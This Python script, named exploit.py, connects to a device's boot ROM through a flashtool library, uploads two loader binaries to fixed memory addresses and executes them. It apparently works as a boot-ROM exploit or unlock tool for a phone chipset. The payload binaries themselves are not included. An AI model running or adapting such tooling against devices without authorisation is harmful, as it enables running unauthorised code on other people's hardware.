exploit.py
#! /usr/bin/python3
from flashtool import *
import os
# Largest data frame handed to cmd_data_send per call (0x210 bytes).
MAX_SZ = 528
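def brom_connect(flasher):
    """Ping the BROM, log its reported version, and open a session.

    Args:
        flasher: FlashTool-like object exposing ``cmd_send_ping``,
            ``read_version``, ``cmd_connect`` and ``read_ack``.

    Raises:
        RuntimeError: if the device does not acknowledge ``cmd_connect``.
    """
    flasher.cmd_send_ping()
    log.info("BROM version: {}".format(flasher.read_version()))
    flasher.cmd_connect()
    # Explicit check rather than `assert`: asserts are stripped under
    # `python -O`, which would let the session continue unacknowledged.
    if not flasher.read_ack():
        raise RuntimeError("BROM did not acknowledge cmd_connect")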
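def send_payload(flasher, filename, addr):
    """Upload the file at *filename* to the device at *addr*.

    The transfer is framed as ``cmd_data_start`` / N x ``cmd_data_send`` /
    ``cmd_data_end``; every frame must be acknowledged before the next one
    is issued. Data is sent in ``MAX_SZ``-byte chunks followed by the
    remainder of the file.

    Args:
        flasher: FlashTool-like object exposing ``cmd_data_start``,
            ``cmd_data_send``, ``cmd_data_end`` and ``read_ack``.
        filename: path of the binary blob to send.
        addr: load address announced to the device in ``cmd_data_start``.

    Raises:
        RuntimeError: if any frame is not acknowledged.
        OSError: if *filename* cannot be stat'ed or read.
    """

    def expect_ack(step):
        # `assert` is stripped under `python -O`; a missing ack must always abort.
        if not flasher.read_ack():
            raise RuntimeError(
                "no ack after {} (file {!r}, addr {:#x})".format(step, filename, addr)
            )

    sz = os.stat(filename).st_size
    flasher.cmd_data_start(addr, sz)
    expect_ack("cmd_data_start")
    with open(filename, "rb") as fp:
        # Full-size chunks first; MAX_SZ replaces the 0x210 that was hard-coded here.
        for _ in range(sz // MAX_SZ):
            flasher.cmd_data_send(fp.read(MAX_SZ))
            expect_ack("cmd_data_send")
        # Trailing partial chunk. NOTE(review): when sz is an exact multiple of
        # MAX_SZ this sends an empty frame, as the original did — confirm the
        # device tolerates it.
        flasher.cmd_data_send(fp.read())
        expect_ack("cmd_data_send (tail)")
        log.info("EoF - Payload!")
        flasher.cmd_data_end()
        expect_ack("cmd_data_end")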
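def main():
    """Wait for the device, open the BROM session, stage both loaders and run them.

    Sequence as performed here: connect, send loader A to 0x65000800, send
    loader B to 0x65013fa0, exec, re-send loader A to 0x65000800, exec, then
    log the version string reported afterwards.
    """
    g_ft = FlashTool()
    log.progress("Waiting for device....!")
    # Poll until the transport reports a connected device.
    while not g_ft.device_connect():
        pass
    # connect to BROM
    brom_connect(g_ft)
    # Both paths are used more than once; name them so they stay in sync.
    loader_a = "./loader_0x65000800_1.bin"
    loader_b = "./loader_0x65013fa0.bin"
    # send the first payload
    send_payload(g_ft, loader_a, 0x65000800)
    # send the second payload
    send_payload(g_ft, loader_b, 0x65013fa0)
    # execute the loader at the above address
    g_ft.cmd_data_exec()
    # re-send the first payload (same file and address as before)
    send_payload(g_ft, loader_a, 0x65000800)
    # The execution of FDL-1
    g_ft.cmd_data_exec()
    log.info("FDL version: {}".format(g_ft.read_version()))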
# Script entry point: only run the flashing sequence when executed directly,
# not when the module is imported.
if __name__ == "__main__":
    main()